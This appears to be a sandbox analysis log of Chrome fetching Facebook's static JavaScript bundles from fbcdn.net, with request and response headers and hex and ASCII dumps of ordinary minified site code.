                                                                                                                                                                                                                                  2024-09-29 04:53:18 UTC5492INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 49 6e 74 6c 43 4c 44 52 4e 75 6d 62 65 72 54 79 70 65 30 33 22 2c 5b 22 49 6e 74 6c 56 61 72 69 61 74 69 6f 6e 73 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 61 3d 7b 67 65 74 56 61 72 69 61 74 69 6f 6e 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 3d 3d 3d 30 7c 7c 61 3d 3d 3d 31 29 72 65 74 75 72 6e 20 63 28 22 49 6e 74 6c 56 61 72 69 61 74 69 6f 6e 73 22 29 2e 4e 55 4d 42 45 52 5f 4f 4e 45 3b 65 6c 73 65 20 72 65 74 75 72 6e 20 63 28 22 49 6e 74 6c 56 61 72 69 61 74 69 6f 6e 73 22 29 2e 4e 55 4d 42 45 52 5f 4f 54 48 45 52 7d 7d 3b 62 3d 61 3b 67 5b 22 64 65 66 61 75 6c 74 22 5d 3d 62 7d 29 2c 39 38 29
                                                                                                                                                                                                                                  Data Ascii: /*FB_PKG_DELIM*/__d("IntlCLDRNumberType03",["IntlVariations"],(function(a,b,c,d,e,f,g){"use strict";a={getVariation:function(a){if(a===0||a===1)return c("IntlVariations").NUMBER_ONE;else return c("IntlVariations").NUMBER_OTHER}};b=a;g["default"]=b}),98)


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  29192.168.2.649757157.240.251.94431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:18 UTC581OUTGET /rsrc.php/v3/ys/r/4zS6aBDBtHT.js HTTP/1.1
                                                                                                                                                                                                                                  Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  Origin: https://www.facebook.com
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                  Referer: https://www.facebook.com/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:18 UTC1943INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                  content-md5: 7SY8y7UBL6gkDv/oCq1cwQ==
                                                                                                                                                                                                                                  Expires: Sat, 20 Sep 2025 09:33:05 GMT
                                                                                                                                                                                                                                  Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                  report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                  timing-allow-origin: *
                                                                                                                                                                                                                                  document-policy: force-load-at-top
                                                                                                                                                                                                                                  permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                  origin-agent-cluster: ?1
                                                                                                                                                                                                                                  X-FB-Debug: 4IjvPrZZGx95erGMRzAOo6dkBurwZ+H5E55ck7dBBNAWDFwBiJnypRK4AOUD4zNR3NhptJwI1t0seQxgFu7H6g==
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:18 GMT
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://www.facebook.com
                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                  X-FB-Connection-Quality: GOOD; q=0.7, rtt=88, rtx=0, c=14, mss=1392, tbw=3412, tp=-1, tpl=-1, uplat=1, ullat=-1
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 9204
                                                                                                                                                                                                                                  2024-09-29 04:53:18 UTC1INData Raw: 3b
                                                                                                                                                                                                                                  Data Ascii: ;
                                                                                                                                                                                                                                  2024-09-29 04:53:18 UTC9203INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 42 61 6e 7a 61 69 22 2c 5b 22 63 72 3a 37 33 38 33 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 29 7b 67 5b 22 64 65 66 61 75 6c 74 22 5d 3d 62 28 22 63 72 3a 37 33 38 33 22 29 7d 29 2c 39 38 29 3b 0a 5f 5f 64 28 22 45 76 65 6e 74 45 6d 69 74 74 65 72 57 69 74 68 56 61 6c 69 64 61 74 69 6f 6e 22 2c 5b 22 42 61 73 65 45 76 65 6e 74 45 6d 69 74 74 65 72 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 62 61 62 65 6c 48 65 6c 70 65 72 73 2e 69 6e 68 65 72 69 74 73 4c 6f 6f 73 65 28 62 2c 61 29 3b 66 75 6e 63 74 69 6f 6e 20 62 28 62 2c 63 29 7b 76 61
                                                                                                                                                                                                                                  Data Ascii: /*FB_PKG_DELIM*/__d("Banzai",["cr:7383"],(function(a,b,c,d,e,f,g){g["default"]=b("cr:7383")}),98);__d("EventEmitterWithValidation",["BaseEventEmitter"],(function(a,b,c,d,e,f){"use strict";a=function(a){babelHelpers.inheritsLoose(b,a);function b(b,c){va


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  30192.168.2.649753157.240.0.64431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:18 UTC374OUTGET /rsrc.php/v3/y1/r/s1oFVSwofs5.js HTTP/1.1
                                                                                                                                                                                                                                  Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:18 UTC1932INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                  content-md5: JeQBSwe7uoLa+eQ9UCgPuA==
                                                                                                                                                                                                                                  Expires: Sun, 28 Sep 2025 02:41:44 GMT
                                                                                                                                                                                                                                  Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                  report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                  timing-allow-origin: *
                                                                                                                                                                                                                                  document-policy: force-load-at-top
                                                                                                                                                                                                                                  permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                  origin-agent-cluster: ?1
                                                                                                                                                                                                                                  X-FB-Debug: wOgoprlLZ6qk6bv5lxnYRLtnhzj8ZCqElLdWdm4KSA0aQNLfHEQkQ8eaZ4CTv6WrCq+NaTu0bwkQysX3mJ++6w==
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:18 GMT
                                                                                                                                                                                                                                  X-FB-Connection-Quality: GOOD; q=0.7, rtt=100, rtx=0, c=14, mss=1392, tbw=3412, tp=-1, tpl=-1, uplat=9, ullat=-1
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 354326
                                                                                                                                                                                                                                  2024-09-29 04:53:18 UTC1INData Raw: 3b
                                                                                                                                                                                                                                  Data Ascii: ;
                                                                                                                                                                                                                                  2024-09-29 04:53:18 UTC15870INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 67 6c 6f 62 61 6c 54 68 69 73 7c 7c 74 79 70 65 6f 66 20 73 65 6c 66 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 73 65 6c 66 7c 7c 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 67 6c 6f 62 61 6c 3b 69 66 28 74 79 70 65 6f 66 20 61 2e 41 62 6f 72 74 43 6f 6e 74 72 6f 6c 6c 65 72 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 29 72 65 74 75 72 6e 3b 76 61 72 20 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 61 28 29 7b 74 68 69 73 2e 5f 5f 6c 69 73 74 65 6e
                                                                                                                                                                                                                                  Data Ascii: /*FB_PKG_DELIM*/"use strict";(function(){var a=typeof globalThis!=="undefined"&&globalThis||typeof self!=="undefined"&&self||typeof global!=="undefined"&&global;if(typeof a.AbortController!=="undefined")return;var b=function(){function a(){this.__listen
                                                                                                                                                                                                                                  2024-09-29 04:53:18 UTC16384INData Raw: 75 6d 65 72 61 62 6c 65 3d 64 2e 65 6e 75 6d 65 72 61 62 6c 65 7c 7c 21 31 3b 64 2e 63 6f 6e 66 69 67 75 72 61 62 6c 65 3d 21 30 3b 22 76 61 6c 75 65 22 69 6e 20 64 26 26 28 64 2e 77 72 69 74 61 62 6c 65 3d 21 30 29 3b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 61 2c 64 2e 6b 65 79 2c 64 29 7d 7d 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 62 2c 63 2c 64 29 7b 63 26 26 61 28 62 2e 70 72 6f 74 6f 74 79 70 65 2c 63 29 3b 64 26 26 61 28 62 2c 64 29 3b 72 65 74 75 72 6e 20 62 7d 7d 28 29 3b 62 2e 69 6e 68 65 72 69 74 73 4c 6f 6f 73 65 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 61 2c 62 29 3b 61 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 62 26 26 62 2e 70 72
                                                                                                                                                                                                                                  Data Ascii: umerable=d.enumerable||!1;d.configurable=!0;"value"in d&&(d.writable=!0);Object.defineProperty(a,d.key,d)}}return function(b,c,d){c&&a(b.prototype,c);d&&a(b,d);return b}}();b.inheritsLoose=function(a,b){Object.assign(a,b);a.prototype=Object.create(b&&b.pr
                                                                                                                                                                                                                                  2024-09-29 04:53:18 UTC16384INData Raw: 74 68 3b 61 2b 2b 29 74 68 69 73 2e 24 32 5b 61 5d 2e 72 65 6d 6f 76 65 28 29 3b 74 68 69 73 2e 24 32 2e 6c 65 6e 67 74 68 3d 30 7d 2c 74 68 69 73 2e 24 31 3d 61 2c 74 68 69 73 2e 24 32 3d 62 7d 76 61 72 20 62 3d 61 2e 70 72 6f 74 6f 74 79 70 65 3b 62 2e 69 73 46 6f 72 41 72 62 69 74 65 72 49 6e 73 74 61 6e 63 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 24 31 7c 7c 68 28 30 2c 32 35 30 36 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 24 31 3d 3d 3d 61 7d 3b 72 65 74 75 72 6e 20 61 7d 28 29 3b 67 5b 22 64 65 66 61 75 6c 74 22 5d 3d 61 7d 29 2c 39 38 29 3b 0a 5f 5f 64 28 22 70 65 72 66 6f 72 6d 61 6e 63 65 22 2c 5b 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 62 3d 61 2e 70 65 72
                                                                                                                                                                                                                                  Data Ascii: th;a++)this.$2[a].remove();this.$2.length=0},this.$1=a,this.$2=b}var b=a.prototype;b.isForArbiterInstance=function(a){this.$1||h(0,2506);return this.$1===a};return a}();g["default"]=a}),98);__d("performance",[],(function(a,b,c,d,e,f){"use strict";b=a.per
                                                                                                                                                                                                                                  2024-09-29 04:53:18 UTC16384INData Raw: 28 62 29 7b 24 3d 62 2c 74 79 70 65 6f 66 20 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 21 75 61 26 26 28 75 61 3d 21 30 2c 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 75 6e 68 61 6e 64 6c 65 64 72 65 6a 65 63 74 69 6f 6e 22 2c 76 61 29 29 7d 76 61 72 20 78 61 3d 7b 6f 6e 75 6e 68 61 6e 64 6c 65 64 72 65 6a 65 63 74 69 6f 6e 3a 76 61 2c 73 65 74 75 70 3a 77 61 7d 3b 63 3d 7b 70 72 65 53 65 74 75 70 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 28 61 3d 3d 6e 75 6c 6c 7c 7c 61 2e 69 67 6e 6f 72 65 4f 6e 45 72 72 6f 72 21 3d 3d 21 30 29 26 26 77 2e 73 65 74 75 70 28 52 29 2c 28 61 3d 3d 6e 75 6c 6c 7c 7c 61 2e 69 67 6e 6f 72 65 4f 6e 55 6e 61 68 6e 64 6c 65 64 52 65 6a 65 63 74 69 6f 6e 21 3d
                                                                                                                                                                                                                                  Data Ascii: (b){$=b,typeof a.addEventListener==="function"&&!ua&&(ua=!0,a.addEventListener("unhandledrejection",va))}var xa={onunhandledrejection:va,setup:wa};c={preSetup:function(a){(a==null||a.ignoreOnError!==!0)&&w.setup(R),(a==null||a.ignoreOnUnahndledRejection!=
                                                                                                                                                                                                                                  2024-09-29 04:53:18 UTC1500INData Raw: 65 2f 69 6e 69 74 22 2c 74 74 69 3a 22 74 74 69 5f 62 69 67 70 69 70 65 22 2c 64 69 73 70 6c 61 79 65 64 3a 22 61 6c 6c 5f 70 61 67 65 6c 65 74 73 5f 64 69 73 70 6c 61 79 65 64 22 2c 6c 6f 61 64 65 64 3a 22 61 6c 6c 5f 70 61 67 65 6c 65 74 73 5f 6c 6f 61 64 65 64 22 7d 2c 73 65 74 43 75 72 72 65 6e 74 49 6e 73 74 61 6e 63 65 5f 44 4f 5f 4e 4f 54 5f 55 53 45 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 67 3d 61 7d 2c 67 65 74 43 75 72 72 65 6e 74 49 6e 73 74 61 6e 63 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 67 7d 7d 3b 65 2e 65 78 70 6f 72 74 73 3d 61 7d 29 2c 6e 75 6c 6c 29 3b 0a 5f 5f 64 28 22 72 65 71 75 69 72 65 43 6f 6e 64 22 2c 5b 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 66 75 6e 63 74 69 6f 6e 20 61 28
                                                                                                                                                                                                                                  Data Ascii: e/init",tti:"tti_bigpipe",displayed:"all_pagelets_displayed",loaded:"all_pagelets_loaded"},setCurrentInstance_DO_NOT_USE:function(a){g=a},getCurrentInstance:function(){return g}};e.exports=a}),null);__d("requireCond",[],(function(a,b,c,d,e,f){function a(
                                                                                                                                                                                                                                  2024-09-29 04:53:18 UTC14884INData Raw: 7c 7c 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 29 3b 72 65 74 75 72 6e 20 69 7d 66 75 6e 63 74 69 6f 6e 20 61 28 61 29 7b 69 66 28 28 68 7c 7c 28 68 3d 63 28 22 45 78 65 63 75 74 69 6f 6e 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 29 29 29 2e 69 73 49 6e 57 6f 72 6b 65 72 29 7b 61 28 6e 75 6c 6c 29 3b 72 65 74 75 72 6e 7d 76 61 72 20 62 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 44 6f 63 75 6d 65 6e 74 46 72 61 67 6d 65 6e 74 28 29 3b 61 28 62 29 3b 6a 28 29 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 62 29 7d 67 2e 67 65 74 44 4f 4d 43 6f 6e 74 61 69 6e 65 72 4e 6f 64 65 3d 6a 3b 67 2e 62 61 74 63 68 44 4f 4d 49 6e 73 65 72 74 3d 61 7d 29 2c 39 38 29 3b 0a 5f 5f 64 28 22 6f 62 6a 65 63 74 56 61 6c 75 65 73 22 2c 5b 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c
                                                                                                                                                                                                                                  Data Ascii: ||document.body);return i}function a(a){if((h||(h=c("ExecutionEnvironment"))).isInWorker){a(null);return}var b=document.createDocumentFragment();a(b);j().appendChild(b)}g.getDOMContainerNode=j;g.batchDOMInsert=a}),98);__d("objectValues",[],(function(a,b,
                                                                                                                                                                                                                                  2024-09-29 04:53:18 UTC16384INData Raw: 73 2e 24 33 3d 74 68 69 73 2e 24 33 7c 7c 6e 65 77 20 4d 61 70 28 29 3b 74 68 69 73 2e 24 33 2e 73 65 74 28 61 2c 62 29 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 62 2e 61 64 64 56 65 63 74 6f 72 45 6c 65 6d 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 3d 74 68 69 73 2e 24 33 3d 74 68 69 73 2e 24 33 7c 7c 6e 65 77 20 4d 61 70 28 29 2c 64 3d 74 68 69 73 2e 24 33 2e 67 65 74 28 61 29 7c 7c 5b 5d 3b 64 2e 70 75 73 68 28 62 29 3b 63 2e 73 65 74 28 61 2c 64 29 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 62 2e 72 65 67 69 73 74 65 72 4f 6e 42 65 66 6f 72 65 53 65 6e 64 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 24 34 2e 70 75 73 68 28 61 29 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 62 2e 70 72 65 70 61 72 65 54 6f 53 65 6e 64 3d
                                                                                                                                                                                                                                  Data Ascii: s.$3=this.$3||new Map();this.$3.set(a,b);return this};b.addVectorElement=function(a,b){var c=this.$3=this.$3||new Map(),d=this.$3.get(a)||[];d.push(b);c.set(a,d);return this};b.registerOnBeforeSend=function(a){this.$4.push(a);return this};b.prepareToSend=
                                                                                                                                                                                                                                  2024-09-29 04:53:18 UTC16384INData Raw: 20 6e 65 77 20 45 72 72 6f 72 28 63 28 22 65 72 72 22 29 28 61 2e 6d 65 73 73 61 67 65 29 29 7d 7d 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 62 61 62 65 6c 48 65 6c 70 65 72 73 2e 69 6e 68 65 72 69 74 73 4c 6f 6f 73 65 28 62 2c 61 29 3b 62 2e 74 72 79 50 61 72 73 65 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 63 2c 65 2c 66 29 7b 65 3d 3d 3d 76 6f 69 64 20 30 26 26 28 65 3d 28 69 7c 7c 28 69 3d 64 28 22 55 52 49 53 63 68 65 6d 65 73 22 29 29 29 2e 4f 70 74 69 6f 6e 73 2e 49 4e 43 4c 55 44 45 5f 44 45 46 41 55 4c 54 53 29 3b 65 3d 6e 65 77 20 62 28 6e 75 6c 6c 2c 63 2c 65 2c 66 29 3b 72 65 74 75 72 6e 20 6a 28 65 2c 61 2c 21 31 2c 63 29 3f 65 3a 6e 75 6c 6c 7d 3b 62 2e 69 73 56 61 6c 69 64 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 63 2c 65 2c 66 29 7b 65 3d 3d 3d 76 6f
                                                                                                                                                                                                                                  Data Ascii: new Error(c("err")(a.message))}}a=function(a){babelHelpers.inheritsLoose(b,a);b.tryParse=function(a,c,e,f){e===void 0&&(e=(i||(i=d("URISchemes"))).Options.INCLUDE_DEFAULTS);e=new b(null,c,e,f);return j(e,a,!1,c)?e:null};b.isValid=function(a,c,e,f){e===vo
                                                                                                                                                                                                                                  2024-09-29 04:53:18 UTC14884INData Raw: 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 2e 6c 6f 61 64 4d 6f 64 75 6c 65 73 28 5b 62 2e 67 65 74 4d 6f 64 75 6c 65 49 64 41 73 52 65 66 28 29 5d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 22 70 72 65 6c 6f 61 64 3a 20 22 2b 63 29 7d 29 7d 3b 65 2e 65 71 75 61 6c 73 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 74 68 69 73 3d 3d 3d 61 7c 7c 74 68 69 73 2e 24 31 3d 3d 61 2e 24 31 7d 3b 65 2e 67 65 74 4d 6f 64 75 6c 65 49 66 52 65 71 75 69 72 65 61 62 6c 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 64 28 22 4a 53 52 65 73 6f 75 72 63 65 45 76 65 6e 74 73 22 29 2e 6e 6f 74 69 66 79 28 74 68 69 73 2e 24 31 2c 74 68 69 73 2e 24 32 2c 22 41 43 43 45 53 53 45 44 22 29 3b 72 65 74 75 72 6e 20 63 28 22 69 66 52 65 71 75 69 72 65 61 62 6c 65
                                                                                                                                                                                                                                  Data Ascii: unction(a){return a.loadModules([b.getModuleIdAsRef()],function(){},"preload: "+c)})};e.equals=function(a){return this===a||this.$1==a.$1};e.getModuleIfRequireable=function(){d("JSResourceEvents").notify(this.$1,this.$2,"ACCESSED");return c("ifRequireable


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  31192.168.2.649755157.240.251.94431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:18 UTC581OUTGET /rsrc.php/v3/yr/r/OJuPnvrkEfZ.js HTTP/1.1
                                                                                                                                                                                                                                  Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  Origin: https://www.facebook.com
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                  Referer: https://www.facebook.com/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:18 UTC1943INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                  content-md5: yF/Bm975u33ArWnQvO8H2A==
                                                                                                                                                                                                                                  Expires: Wed, 24 Sep 2025 18:35:25 GMT
                                                                                                                                                                                                                                  Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                  report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                  timing-allow-origin: *
                                                                                                                                                                                                                                  document-policy: force-load-at-top
                                                                                                                                                                                                                                  permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                  origin-agent-cluster: ?1
                                                                                                                                                                                                                                  X-FB-Debug: LNJmrBhlS/R4HyNDN9wvMWjr8Y5AIDs+m77GNsMTNktpVS7kNXJLp78hw18hRCwaJ+ZSuT+/igi/z0nzAPI8Bw==
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:18 GMT
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://www.facebook.com
                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                  X-FB-Connection-Quality: GOOD; q=0.7, rtt=89, rtx=0, c=14, mss=1392, tbw=3411, tp=-1, tpl=-1, uplat=0, ullat=-1
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 2078
                                                                                                                                                                                                                                  2024-09-29 04:53:18 UTC1INData Raw: 3b
                                                                                                                                                                                                                                  Data Ascii: ;
